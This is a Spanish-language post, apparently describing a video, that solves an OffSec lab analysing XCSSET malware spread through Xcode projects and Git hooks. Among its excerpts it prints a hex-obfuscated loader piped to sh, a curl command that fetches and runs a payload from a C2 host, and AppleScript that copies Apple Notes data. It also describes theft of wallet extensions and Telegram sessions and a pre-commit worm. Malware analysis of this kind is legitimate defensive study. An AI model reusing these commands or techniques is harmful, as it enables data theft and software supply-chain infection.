🥶 EVENTO OffSec "Arctic Howl 2026" - Destripando XCSSET: Malware en Xcode/Git - LAB 1 🥶

🔻🔻🔻🔻🔻🔻🔻🔻🔻🔻🔻🔻🔻🔻🔻🔻 ♒️ P4IM0N - noob autodidacta... ¡jajaja! SOLO SÉ QUE NO SÉ NADA... Pero hablemos sin saber... ¡Jajaja! 🌐 NerdHacker Academy: https://nerdhacker.base44.app/ 👨‍💻DISCORD COMUNIDAD: https://shre.ink/NerdHacker-Academy 🔴 TODAS MIS REDES SOCIALES AQUÍ: beacons.ai/p4im0n_h4cking 🎙PODCAST SPOTIFY: https://creators.spotify.com/pod/show... 🥶 HERMOSO EVENTO OffSec "Arctic Howl" - RESUELTO LAB 1 🥶 🎬 Anatomía del Ataque: Flujo Completo de Infección 🎯Fase 1: El Cebo y la Infección Inicial (Vía Xcode) La víctima descarga un repositorio aparentemente inofensivo desde su servidor Gitea local (GET /archive/main.zip). Al descomprimirlo y abrir MarkdownEditor.xcodeproj en Xcode, una regla de compilación maliciosa ejecuta un script oculto llamado xcassets.sh. Este script está ofuscado usando tres capas de codificación hexadecimal para evadir los antivirus estáticos: Bash #!/usr/bin/env bash x=$(echo '333633....33633363337...' | xxd -p -r | xxd -p -r | xxd -p -r | sh ) bash -c "$x" 🎯Fase 2: El "Stager" y Contacto con el C2 Al decodificar esas tres capas hexadecimales, el script revela su verdadera intención: hacer una petición silenciosa al servidor de Comando y Control (C2) del atacante para descargar el framework principal de la botnet. Ese comando ofuscado se veía así: Bash echo "$(curl -fskL -d "os=$(uname -s)&p=default" -o /tmp/.o.txt http://bu1knames.io/a)" | sh >/dev/null 2>&1 & El servidor responde con un bloque gigante codificado en Base64 siete veces, que al resolverse instala el motor principal en la memoria de la Mac. 🎯Fase 3: Descarga de Módulos y Exfiltración (El Robo) Una vez establecido, el malware comienza a pedir módulos especializados (looz, cozfi_xhh, seizecj, txzx_vostfdi, etc.) para saquear la máquina. Inventario del Sistema (looz y seizecj): Recopilan versiones de SO, estado del Firewall (SIP) y listan todas las aplicaciones instaladas para perfilar a la víctima. AppleScript set outputText to "=== macOS Application & Security Inventory ===" & linefeed & linefeed set outputText to outputText & ">> Applications (/Applications)" & linefeed & userApps Robo de Datos Sensibles (cozfi_xhh): Apunta directamente a las bases de datos locales de Apple Notes y Reminders, las comprime en un ZIP y las exfiltra. AppleScript set notesPath to (POSIX path of (path to home folder)) & "Library/Group Containers/group.com.apple.notes/" do shell script "cp -R " & quoted form of notesPath & " " & quoted form of backupFolder Criptomonedas y Chats (txzx_vostfdi): Busca extensiones de navegadores correspondientes a billeteras (MetaMask, Phantom, Trust) y roba la sesión local de Telegram Desktop. 🎯Fase 4: Propagación y Persistencia (El Gusano) Para asegurar que la infección sobreviva y se expanda a otros desarrolladores, entra en juego el módulo jez. Este script busca todas las carpetas .git en el sistema de la víctima y modifica los hooks de Git (pre-commit) inyectando el código malicioso. Así, la próxima vez que el desarrollador haga un commit, subirá el malware al repositorio limpio.